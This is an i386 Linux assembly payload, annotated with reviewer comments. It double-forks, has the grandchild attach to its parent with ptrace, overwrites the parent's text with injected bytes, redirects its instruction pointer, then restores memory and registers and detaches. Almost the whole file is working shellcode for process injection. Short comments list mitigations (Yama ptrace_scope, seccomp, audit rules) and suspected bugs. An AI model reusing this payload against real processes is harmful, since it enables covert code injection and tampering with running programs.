.globl cbegin
.globl cend
/*
 * i386 Linux, AT&T/GAS syntax, raw int $0x80 syscalls (nr in eax; args in
 * ebx, ecx, edx, esi, edi; ptrace(request=ebx, pid=ecx, addr=edx, data=esi)).
 *
 * cbegin..cend bracket one position-dependent payload: it forks, the
 * grandchild PTRACE_ATTACHes to the original process (the payload's own
 * parent), saves a window of that process's memory and its registers,
 * writes the bytes at pointX..cend into the saved window, resumes the
 * target, waits for it to stop, then restores memory and registers and
 * detaches. The parent side merely sleeps and spins so the target stays
 * alive and stable while it is traced.
 *
 * Reviewer notes (defensive):
 *  - Arguments are built with "push imm / pop reg" and cdq (edx = 0
 *    whenever eax is non-negative); these are chosen for short encodings,
 *    not clarity. ebp holds the target pid for the whole child path.
 *  - 0x08048210 and 0xbffff010 are hard-coded: presumably a non-PIE text
 *    address in the target and a fixed stack address in this process.
 *    Under PIE/ASLR neither is stable, so address randomisation alone
 *    breaks this flow.
 *  - Mitigation/detection: Yama ptrace_scope >= 1 denies PTRACE_ATTACH to
 *    a non-descendant (the parent here); a seccomp policy that denies
 *    ptrace, or audit rules on the ptrace syscall, will surface this
 *    sequence (attach, peek/poke loops, getregs/setregs, cont, detach)
 *    issued by a freshly double-forked child.
 */
cbegin:
/* getppid (nr 64): eax = pid of our parent, which is the ptrace target */
pushl $64
popl %eax
int $0x80
/* keep the target pid both on the stack (popped into ecx on the child path)
   and in ebp (used as the pid argument of every ptrace call below) */
pushl %eax
xchgl %ebp, %eax
/* fork (nr 2): eax = child pid in the parent, 0 in the child */
pushl $2
popl %eax
int $0x80
or %eax, %eax
je fchild
/*** PARENT (the process that will be traced) ***/
/* waitpid (nr 7): ecx = NULL status, edx = 0 options.
   NOTE(review): ebx, the pid argument, is not loaded here; it holds whatever
   it held on entry to cbegin. */
pushl $7
popl %esi
xchgl %esi, %eax /* eax = 7, esi = child pid returned by fork */
xorl %ecx, %ecx
xorl %edx, %edx
int $0x80
/* nanosleep (nr 162): both req (ebx) and rem (ecx) point at the two dwords
   just pushed, i.e. a timespec whose fields are both 10 */
xorl %eax, %eax
movb $162, %al
pushl $10
pushl $10
movl %esp, %ebx
movl %esp, %ecx
int $0x80
/* spin forever after the sleep; the tracer detaches and exits on its own */
ui:
jmp ui
/* exit(0) (nr 1); reached by the intermediate child of the second fork */
fexit:
pushl $1
popl %eax
xorl %ebx, %ebx
int $0x80
/*** CHILD ***/
fchild: pushl $2 /* second fork (nr 2): the intermediate process exits, the grandchild traces */
popl %eax
int $0x80
or %eax, %eax
jne fexit
popl %ecx /* target pid (pushed right after getppid above) */
/* ptrace attach: eax = 26 (ptrace), ebx = 16 (PTRACE_ATTACH), ecx = pid,
   edx = 0 via cdq (eax is positive), esi = 0 */
pushl $26
popl %eax
cdq
pushl $16
popl %ebx
xorl %esi, %esi
int $0x80
/* ptrace peekdata: edx = target address to read, esi = local buffer the kernel
   stores each word into, edi = iteration count */
movl $0x08048210, %edx
/* movl $0xbf7ff010, %edx */
movl $0xbffff010, %esi
pushl $127
popl %edi
loopa:
movl %ebp, %ecx
pushl $26
popl %eax
pushl $2 /* PTRACE_PEEKDATA */
popl %ebx
pushl %edi /* edi kept across the syscall */
int $0x80
popl %edi
/* NOTE(review): both pointers advance by one byte, not one word, so the 127
   words read here overlap; the restore loop (loopb) below advances the same way */
incl %edx
incl %esi
decl %edi
jnz loopa
/* ptrace getregs: ebx = 12 (PTRACE_GETREGS), esi = esp after pusha, i.e. the
   kernel writes the target's register block over the pusha area on our stack.
   NOTE(review): pusha reserves 32 bytes; a full i386 register block is larger,
   so the write presumably extends above the pusha area — confirm. */
movl %ebp, %ecx
pushl $26
popl %eax
pushl $12
popl %ebx
pusha
movl %esp, %esi
int $0x80
/* ptrace setregs: ebx = 13 (PTRACE_SETREGS). Offset 48 in the saved block is
   read out (edi), preserved on the stack, and replaced with the fixed text
   address; presumably the instruction-pointer slot of user_regs_struct —
   verify against the target kernel's layout. */
movl %ebp, %ecx
pushl $26
popl %eax
pushl $13
popl %ebx
movl %esp, %esi
movl 48(%esi), %edi
pushl %edi
movl $0x08048210, 48(%esi)
/* movl $0xbf7ff010, 48(%esi)*/
int $0x80
/* call/pop trick: pointX does `call pointY`, so the popped return address is
   the address of the bytes that follow the call (the code to be written) */
jmp pointX
pointY:
popl %esi
/* ptrace pokedata loop (loopc): copy 20 words from our own bytes at esi into
   the target starting at the fixed text address. esi is both the source
   pointer and the data argument, so it is saved/restored around the syscall. */
movl $0x08048210, %edx
pushl $20
popl %edi
loopc:
movl %ebp, %ecx
pushl $26
popl %eax
pushl $5 /* PTRACE_POKEDATA */
popl %ebx
pushl %edi
pushl %esi
movl (%esi), %esi
int $0x80
popl %esi
popl %edi
incl %edx
incl %esi
decl %edi
jnz loopc
/* ptrace pokedata (earlier single-word variant, left commented out) */
/* movl %ebp, %ecx
pushl $26
popl %eax
pushl $5
popl %ebx
movl $0xccccfeeb, %esi*/
/* movl $0xbf7ff010, %edx*/
movl $0x08048210, %edx
/* int $0x80*/
/* ptrace cont: ebx = 7 (PTRACE_CONT), edx = 0, esi = 0 (no signal) */
movl %ebp, %ecx
pushl $26
popl %eax
cdq
pushl $7
popl %ebx
xorl %esi, %esi
int $0x80
/* wait4 (nr 114): assumes eax == 0 on return from cont, so cdq gives edx = 0,
   ebx = eax - 1 = -1 (any child; the tracee reports to its tracer), ecx = 0
   (no status), esi still 0 (no rusage). Blocks until the target stops. */
cdq
movl %eax, %ebx
decl %ebx
movl %eax, %ecx
movb $114, %al
int $0x80
/* ptrace pokedata loop (loopb): write the 127 saved words from the local buffer
   back to the target, undoing the peekdata copy above */
movl $0x08048210, %edx
movl $0xbffff010, %esi
/* movl $0xbf7ff010, %edx*/
pushl $127
popl %edi
loopb:
movl %ebp, %ecx
pushl $26
popl %eax
pushl $5 /* PTRACE_POKEDATA */
popl %ebx
pushl %edi
pushl %esi
movl (%esi), %esi
int $0x80
popl %esi
popl %edi
incl %edx
incl %esi
decl %edi
jnz loopb
/* ptrace setregs: put the original value back into offset 48 of the saved
   register block (still at esp once the saved edi is popped) */
popl %edi
movl %ebp, %ecx
pushl $26
popl %eax
pushl $13
popl %ebx
movl %esp, %esi
movl %edi, 48(%esi)
int $0x80
/* ptrace detach: ebx = 17 (PTRACE_DETACH), edx = esi = 0 */
movl %ebp, %ecx
pushl $17
popl %ebx
pushl $26
popl %eax
cdq
movl %edx, %esi
int $0x80
/* exit (nr 1): eax = esi = edx + 1 = 1; ebx (the status) is whatever is left
   in it from the detach call */
xorl %ecx, %ecx
incl %esi
xchgl %esi, %eax
int $0x80
/* Bytes from here to cend are what loopc copies into the target: `call pointY`
   pushes the address of the instruction after it, which pointY pops. */
pointX:
call pointY
pushl $2 /* second fork */
popl %eax
int $0x80
or %eax, %eax
je pointA
/* parent side of that fork: breakpoint trap, which is the stop the tracer's
   wait4 above is waiting for */
int $0x3
/* child side: spin */
pointA:
jmp pointA
cend: